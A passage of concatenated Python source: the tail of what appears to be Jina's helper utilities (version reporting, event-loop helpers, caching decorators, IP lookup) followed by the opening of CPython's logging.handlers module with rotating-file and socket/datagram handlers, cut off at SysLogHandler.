__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode().strip()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
return shell in ['ZMQInteractiveShell', 'Shell']
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'.*.ya?ml$' if __windows__ else r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if (
not isinstance(part1, int)
and not isinstance(_dict, (Iterable, ListValue))
and isinstance(_dict, (dict, Struct, MessageMapContainer))
and part1 in _dict
or isinstance(part1, int)
or isinstance(_dict, (Iterable, ListValue))
):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
pass
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
if "b" not in mode:
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
# See bpo-44753: Don't use the extension when computing the prefix.
prefix = os.path.splitext(baseName)[0] + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
if "b" not in mode:
encoding = io.text_encoding(encoding)
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
